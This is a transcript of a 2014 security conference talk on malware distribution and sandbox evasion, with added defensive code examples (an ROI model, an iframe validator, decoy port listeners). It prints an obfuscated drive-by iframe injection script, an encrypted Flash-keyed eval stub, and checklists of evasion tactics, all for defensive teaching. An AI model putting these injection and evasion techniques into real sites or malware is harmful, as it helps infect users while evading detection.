Thinking Outside the Sand[box]


Published on February 24, 2014

Author: junipernetworks



Kyle Adams - Chief Software Architect for Junos Web App Secure - presents at San Francisco's BSides 2014

Thinking Outside the [Sand]box
Kyle Adams - Juniper Networks
This presentation is for educational purposes only

Introduction
Chief Software Architect for Junos Web App Secure
“Junos Web App Secure is a security deception technology designed to lace web applications with honeypots on-the-fly”
More recently, leading efforts in malware research. Can’t share exactly why, but I can share some interesting ideas that have surfaced as a result.

Primary Goal
Inoculate your machine from infection by specific classes of malware

Background
• Malware Analysis Background
  o Malware Collection Techniques
  o Malware Analysis Techniques
  o Signature Development
• Malware Authoring ROI
  o Malware ROI
  o Optimizing for Success
  o Hypothetical Example
• Evasion
  o Distribution Evasion
  o Sandbox Evasion

Background / Malware Collection
How do analysts get malware samples?
• Web Crawlers
• Torrents
• Usenet
• Malware Repositories
• Email
• Droppers

Background / Malware Analysis
How do malware analysts inspect malware?
• Static File Analysis
• Virtual Machine Sandboxing
• Code Emulation Sandboxing

Background / Signatures
How do malware signatures get created?
1. Get a sample
2. Analyze it for unique behaviors
   - Generate heuristic behavior signature
3. Analyze it for unique data patterns
   - Generate file data signature
4. Distribute new signatures to customers
5. Remove old unnecessary signatures

Background / Malware ROI
Uninterrupted Lifecycle: Research → Development → Testing → Distribution → Grow Infection Base
The infection base grows indefinitely. The more machines infected, the more return the attacker gets for their initial investment. In other words… Time = Money

Background / Malware ROI
Interrupted Lifecycle: Research → Development → Testing → Distribution → Grow Infection Base (cut short by: Sample Collected → Sample Detected → Signature Published)
The infection base grows until a signature is published. Its growth rate then declines rapidly and eventually becomes negligible. The more machines infected, the more return the attacker gets for their initial investment. So… Time to DETECTION = Money

Background / Optimizing For Success
Hypothetical Example:
Bob spends 20 hours researching his target environment. Another 20 hours writing some ransomware and testing it. Finally, Bob pays someone to distribute his malware for 50 cents per infection, with a distribution rate of 200 clients per hour. Bob’s ransom is $300 and 10% of his victims will choose to pay.
So for every hour Bob’s malware is undetected, he makes:
((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour
Assume the infection rate remains constant for 72 hours, and minus Bob’s time at (~$50 an hour), Bob makes a total of $422,800.

Background / Optimizing For Success
Hypothetical Example:
Now assume his malware is detected and a signature is published, dropping the successful ransom collection rate to 1 client per hour.
(hours_before_detection * (((200 clients * .1) * $300) - (200 clients * $0.50))) + (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50)))
Detection at 6 hours: Bob makes $52,870
Detection at 12 hours: Bob makes $88,500
Detection at 18 hours: Bob makes $120,130
Detection at 24 hours: Bob makes $153,760
So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770. That’s a lot of motivation!
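The ROI arithmetic from the two "Optimizing For Success" slides, carried through as code. This is an added example and not material from the talk; it takes the slide's hypothetical figures as named constants, deducts Bob's 40 hours at ~$50 in every scenario, and reproduces the $5,900 per hour, $422,800, $52,870, $120,130 and $153,760 figures. With that labour deduction applied uniformly the 12-hour case comes to $86,500; the slide's $88,500 is what the formula gives before the $2,000 labour cost is taken off.

```python
# Added example, not from the slides: the "Optimizing For Success" ROI model
# as a small set of functions, so the detection-time figures can be recomputed.
# Every parameter below is the slide's hypothetical value for "Bob".

LABOUR_HOURS = 40                   # 20 h research + 20 h writing/testing
LABOUR_RATE = 50.0                  # Bob's own time, ~$50 per hour
INFECTIONS_PER_HOUR = 200           # distribution rate while undetected
DETECTED_INFECTIONS_PER_HOUR = 10   # rate once a signature is published
PAY_FRACTION = 0.10                 # 10% of victims choose to pay
RANSOM = 300.0                      # dollars per paying victim
COST_PER_INFECTION = 0.50           # paid to the distributor per infection
CAMPAIGN_HOURS = 72                 # the slide's fixed campaign length


def hourly_profit(infections_per_hour):
    """Ransom income minus distribution cost for one hour at the given rate."""
    income = infections_per_hour * PAY_FRACTION * RANSOM
    cost = infections_per_hour * COST_PER_INFECTION
    return round(income - cost, 2)


def campaign_profit(hours_before_detection, total_hours=CAMPAIGN_HOURS):
    """Total campaign profit, net of Bob's own labour.

    Detection at or after total_hours means the whole campaign ran undetected;
    detection at hour 0 means every hour ran at the post-signature rate.
    """
    before = min(max(hours_before_detection, 0), total_hours)
    after = total_hours - before
    gross = (before * hourly_profit(INFECTIONS_PER_HOUR)
             + after * hourly_profit(DETECTED_INFECTIONS_PER_HOUR))
    return round(gross - LABOUR_HOURS * LABOUR_RATE, 2)


def profit_per_block(hours, detected):
    """Profit from a block of hours before or after detection (no labour term).

    This is the slide's "each 6 hours" comparison: the same block of time is
    worth 20x more to the author while the sample is still undetected.
    """
    rate = DETECTED_INFECTIONS_PER_HOUR if detected else INFECTIONS_PER_HOUR
    return round(hours * hourly_profit(rate), 2)


def detection_table(hours=(6, 12, 18, 24)):
    """Campaign profit for each candidate time-to-detection."""
    return {h: campaign_profit(h) for h in hours}


if __name__ == "__main__":
    print("per undetected hour:", hourly_profit(INFECTIONS_PER_HOUR))
    print("never detected (72 h):", campaign_profit(CAMPAIGN_HOURS))
    for h, profit in detection_table().items():
        print(f"detection at {h:2d} h: {profit:,.0f}")
```

The only defender-controlled variable in this model is `hours_before_detection`; everything else belongs to the attacker. That is the whole argument of the talk: anything that shortens time to detection, or denies the author those first undetected hours on a given machine, removes most of the value of the campaign.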

Background / Distribution Evasion
• You can’t analyze something you can’t get.
• You can’t generate signatures if you can’t analyze.
So if you can avoid serving malware to analysis labs, you can avoid detection and signature distribution.
Distribution Evasion: Distribute malware only to a select set of targets, narrow enough to exclude analysis labs.

Background / Distribution Evasion
Distribution Evasion Tactics:
• Don’t serve to search engines (Google, Yahoo, Bing, etc…)
• Don’t serve to known security lab IPs (Symantec, McAfee, etc…)
• Don’t serve to an environment you can’t infect (Missing Plugins, Unsupported OS, etc…)
• Randomly choose not to serve
• Serve only to specific countries/IP ranges
• Serve only to known browsers
• Serve only if referer is whitelisted
• Serve only once per IP

Background / Distribution Evasion
Distribution Evasion Implementation:
1. Inject an obfuscated drive-by download hook into compromised sites:

    <script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e=\\"1\\" d=\\"1\\" c=\\""+2+"\\"></3>");</0>',17,17,'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|width|com|write'.split('|'),0,{}))</script>

Deobfuscated, it looks like this:

    <script type="text/javascript">
    var ste = "http://www.google.com"; // the packed keyword table above decodes "4://5.9.f" to this demo URL
    document.write("<iframe width=\"1\" height=\"1\" src=\"" + ste + "\"></iframe>");
    </script>

But this does nothing to stop automated crawlers in a research lab.

Background / Distribution Evasion
Distribution Evasion Implementation:
2. Add client-side specificity: The malware requires a specific version of flash to exploit a client, so the drive-by code can actually hide itself unless you have that version of flash.

    <script type="text/javascript">
    … encryption/decryption code …
    eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b4718585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c4042584451191b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17141e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version));
    </script>

Now if the lab isn’t using flash version, the drive-by iframe will not

Background / Distribution Evasion
Distribution Evasion Implementation:
3. Add server-side specificity and filtering: The iframe points to a server whose sole purpose is to exploit browsers and serve malware. In addition to picking the right exploit for the target client, it will also not serve malware if specific conditions are not met:
• You’re not a search engine
• Your IP is not blacklisted, or is in a whitelist
• You’re using an exploitable OS and browser
• This is the first time you have loaded the iframe
• Drive-by code has been injected into the domain of your referer
Since the research lab doesn't know what conditions the distribution server requires, it is exceptionally difficult to trick it into serving the malware.

Background / Sandbox Evasion
Sandbox Evasion Tactics: If any of the following are true, do not execute the malware payload:
• Significant Clock Skew
• Debugger is attached
• Virtual Machine Detected
• No Internet Connection
• Unexploitable environment
• Sandbox Software Detected
• Sleep statements abort prematurely
Sandboxes can only run for a fixed period of time per sample (usually 30-60 seconds), so the malware may try to run longer:
• Long sleep before payload execution
• Schedule payload execution for some time in the future

Background / Sandbox Evasion
Sandbox evasion techniques can be grouped into several high level categories:
• Specificity
• Triggers
• Detection
• Interruption
• Dialogs
Any given malware sample may do zero or more of these.

Background / Sandbox Evasion
Specificity:
• Has internet connection
• Has correct software versions
• Has correct OS
• Has expected security policies
• Public IP is in correct geographical region
• Clock skew is minimal
• Account data is present (Gmail, AIM, Facebook, etc…)

Background / Sandbox Evasion
Specificity (captions from sample screenshots):
• Requires Email Handling app like Outlook or Thunderbird.
• Requires Internet Connection
• Requires .NET framework
• Requires Win 95/98

Background / Sandbox Evasion
Triggers:
• Sleep for several minutes
• Require multiple executions
• Wait for one or more reboots
• Wait for event
  o User opens .txt file
  o User launches browser
  o User switches to battery power
  o User updates windows
  o User installs software
  o User connects to WiFi
  o HID activity (Mouse, Keyboard, Webcam, Mic)

Background / Sandbox Evasion
Triggers (captions from sample screenshots):
• Requires browser restart to trigger payload.
• Requires a second execution.

Background / Sandbox Evasion
Detection:
• Debugger Hooks
• Virtual Machines
  o Registry Keys, Serial Numbers, MAC addresses
  o Processes, Services, Drivers, Open Ports
  o VM Specific ASM instructions
• Sandbox Software
  o Open Ports, Processes, Files

Background / Sandbox Evasion
Detection (captions from sample screenshots):
• Themida: Legitimate software piracy protection wrapper designed to detect VMs and debuggers. Go figure, malware authors use it too.
• Debugger detection. And hey, they even explained how to turn off SoftIce (just in case you didn’t know how).
• No Printer?

Background / Sandbox Evasion
Interruption:
• Analysis Framework Interruption:
  o Force Reboot or Logout
  o Enable Firewall / Whitelist C&C servers
• Screen Capture Interruption
  o Open dialogs minimized
  o Open other apps Maximized
  o Flashing components / Animation
  o Hidden MouseOver components

Background / Sandbox Evasion
Interruption (captions from sample screenshots):
• Force a reboot.
• Screen Shot Evasion: The “Play” button flashes. We got lucky and took the screenshot at the right time.

Background / Sandbox Evasion
Dialogs:

Background / Sandbox Evasion
Simple Dialogs: What are they?
• Fake Apps
  o Fake Installers
  o Fake Errors
• Why?
  o Prevent sandbox analysis
  o Phish for information
  o Legitimize
    - it looks real, so it’s probably safe
    - red flags (UAC, firewall notices, etc…)

Background / Sandbox Evasion
Simple Dialogs (captions from sample screenshots):
• Legitimize UAC dialogs
• Require basic human input (click a button)

Background / Sandbox Evasion
Advanced Dialogs:
• Require account details
• TOS acceptance
• Combination Lock
• Graphic based dialogs

Background / Sandbox Evasion
Advanced Dialogs (captions from sample screenshots):
• Requires password. Presumably available with the download link.
• Captcha style dialog
• Fake dialog. This dialog looks similar to the default theme of XP, but is clearly not.

Deceptive Inoculation
Bottom line, malware takes great care not to run in a sandbox environment.
Let’s all be sandboxes! (or at least pretend to be)

Deceptive Inoculation
• Distribution Deception
  o Prevent your personal computer from being sent malware in the first place (stop drive-by-downloads).
• Sandbox Deception
  o Prevent malware from executing a payload when launched on your personal computer.

Inoculation / Distribution Evasion
Pretend you’re Googlebot:
1. Firefox: Install User-Agent-Switcher
2. Set User-Agent to: Googlebot-Image (Googlebot)
Pretend none of your plugins are enabled:
1. Firefox: Go to Tools > Add Ons
2. For everything in the list, select “Ask To Activate” (Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...)
Disable Referers:
1. Firefox: Go to about:config
2. Set “network.http.sendRefererHeader” to 0

Inoculation / Distribution Evasion
Request Suspicious Content Twice: This doesn’t exist yet, but what if….
(Diagram: an IFRAME VALIDATOR requests a suspicious iframe, then repeats the request.)
• Bad Server: iframe → embedded flash; repeat → no embedded flash
• Good Server: iframe → no embedded flash
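The validator sketched on this slide, as an added example that is not part of the talk: it fetches nothing itself, but given two responses for the same URL it extracts every active-content element (iframe, embed, object, script) from each and flags the server when the repeat request is handed less than the first one, which is the signature of a distribution server that serves once per IP. The two HTML responses and the hostnames in them are constructed for the example.

```python
# Added example, not from the slides: a first cut at the "IFRAME VALIDATOR".
# The same suspicious page is fetched twice; a distribution server that only
# serves its exploit on the first hit betrays itself by returning a smaller
# set of active content on the repeat request. The responses below are
# constructed sample HTML with placeholder hostnames, not captured traffic.
from html.parser import HTMLParser

ACTIVE_TAGS = {"iframe", "embed", "object", "script"}


class ActiveContentCollector(HTMLParser):
    """Records (tag, source, mime type) for every active-content element."""

    def __init__(self):
        super().__init__()
        self.found = set()

    def handle_starttag(self, tag, attrs):
        if tag not in ACTIVE_TAGS:
            return
        a = dict(attrs)  # attribute values may be None for bare attributes
        source = a.get("src") or a.get("data") or ""
        self.found.add((tag, source, a.get("type") or ""))


def active_content(html):
    """Set of active-content elements found in one response body."""
    collector = ActiveContentCollector()
    collector.feed(html)
    return collector.found


def is_flash(item):
    """The slide's specific case: an embedded Flash object."""
    _tag, source, mime = item
    return mime == "application/x-shockwave-flash" or source.lower().endswith(".swf")


def validate(first_response, repeat_response):
    """Compare active content across two fetches of the same URL.

    'consistent' : identical active content both times (the good server)
    'suspicious' : the repeat got strictly less than the first (the bad server)
    'changed'    : the repeat got different or extra items, e.g. rotating ads;
                   worth a look, but not the signature of one-shot serving
    """
    first = active_content(first_response)
    repeat = active_content(repeat_response)
    withheld = first - repeat
    added = repeat - first
    if not withheld and not added:
        verdict = "consistent"
    elif withheld and not added:
        verdict = "suspicious"
    else:
        verdict = "changed"
    return {
        "verdict": verdict,
        "withheld": sorted(withheld),
        "withheld_flash": any(is_flash(i) for i in withheld),
    }


# Constructed sample responses (placeholder hostnames, not real sites).
FIRST_HIT = """<html><body><p>Welcome</p>
<iframe width="1" height="1" src="http://drive-by.example/land"></iframe>
<embed src="http://drive-by.example/x.swf" type="application/x-shockwave-flash">
</body></html>"""
REPEAT_HIT = "<html><body><p>Welcome</p></body></html>"

if __name__ == "__main__":
    print(validate(FIRST_HIT, REPEAT_HIT))   # suspicious, two items withheld
    print(validate(REPEAT_HIT, REPEAT_HIT))  # consistent
```

The comparison is only as good as the second request: the slide's server-side filters key on IP, referer and plugin state, so a repeat from the same client that merely re-sends the same headers will be refused for the same reason a lab crawler is, and that refusal is exactly what this check is looking for. Where a site legitimately varies its embedded content between loads the verdict falls into "changed" rather than "suspicious", which keeps rotating advertising from tripping the check.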

Inoculation / Sandbox Evasion
Permanent Debugger
1. Install a debugger
2. Hook every process automatically
Spoof VMWare Artifacts:
1. Create stub exe called “VBoxService.exe” and leave it running on boot.
Skew your clock
1. Change system time to be 1 year behind
2. Disable clock syncing

Inoculation / Sandbox Evasion
Sandbox Emulation
1. Open ports (cuckoo: 2042, mongodb: 27017)
2. Configure as Cuckoo Guest: But make sure to cripple the agent!
These changes may result in instability to the system, and would require some additional testing in a well used desktop environment.
1. Add a dll named “dbghelp.dll” to registry so it loads into every process
2. Temporarily Assign windows product ID of “76487-337-8429955-22614” (Assign on boot, revert on shutdown)
Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The
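Step 1 of the sandbox emulation above, as an added example that is not part of the talk's material: a script that binds decoy TCP listeners on the two ports the slide names and answers every connection by hanging up without speaking any protocol, which is one way of leaving the "agent" crippled. Binding to 127.0.0.1 and the half-second accept timeout are my choices; a sample that probes these ports on the local machine sees them open, and nothing else of Cuckoo is present.

```python
# Added example, not from the slides: decoy listeners for the ports the
# "Sandbox Emulation" slide lists. A sample probing for sandbox infrastructure
# finds the ports open; the listener accepts and immediately hangs up, so
# there is no real agent behind them to drive.
import socket
import threading

# Ports exactly as listed on the slide (cuckoo result server and mongodb).
DECOY_PORTS = {"cuckoo": 2042, "mongodb": 27017}


def start_decoy_listener(port, host="127.0.0.1"):
    """Bind a listener on host:port (port 0 = any free port) and return it.

    A daemon thread accepts and closes every connection; closing the returned
    socket stops the thread within the accept timeout.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    srv.settimeout(0.5)  # poll, so the serving thread notices close()

    def serve():
        while True:
            try:
                conn, _peer = srv.accept()
            except socket.timeout:
                continue
            except OSError:  # listener closed from the main thread: stop
                break
            conn.close()  # crippled agent: accept, say nothing, hang up

    threading.Thread(target=serve, daemon=True).start()
    return srv


def is_port_open(port, host="127.0.0.1", timeout=0.5):
    """True if a TCP connect to host:port succeeds (what a probing sample sees)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def visible_decoys(ports=DECOY_PORTS, host="127.0.0.1"):
    """Self-check: which of the named decoy ports currently answer."""
    return {name: is_port_open(port, host) for name, port in ports.items()}


def round_trip(host="127.0.0.1"):
    """Start one decoy on a free port, probe it, close it, probe again.

    Returns (open_while_running, open_after_close); expected (True, False).
    """
    srv = start_decoy_listener(0, host)
    port = srv.getsockname()[1]
    while_running = is_port_open(port, host)
    srv.close()
    after_close = is_port_open(port, host)
    return while_running, after_close


if __name__ == "__main__":
    listeners = [start_decoy_listener(p) for p in DECOY_PORTS.values()]
    print("decoys visible:", visible_decoys())
    try:
        threading.Event().wait()  # hold the ports open until interrupted
    except KeyboardInterrupt:
        for srv in listeners:
            srv.close()
```

Run it as a script to hold the two ports open; `round_trip()` is the self-check, starting a listener on a free port, probing it, closing it and probing again. If a real mongodb (or anything else) already owns 27017 the bind fails, which is the kind of collision the slide's instability warning is about, so check `visible_decoys()` before assuming the machine presents the artifacts.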

Conclusion
Practicality: As it stands, these techniques require some complex administrative/programming tasks, and would need to be updated regularly. Ideally these types of techniques could be packaged into software that automatically updates and manages settings for you.

Conclusion
Perceived Efficacy: With just these 5 strategies, we were able to prevent 20% of malware activity in the samples we analyzed.
True Efficacy: Hard to say how effective it really is, because the samples this works on are less likely to be identified as known malware. Fortunately, this means it will reduce malware infection for samples your AV is unlikely to detect with signatures.

More Information
Contact Info:
Email:
Twitter: kadams_sec
LinkedIn:
Presentation Material:
References:
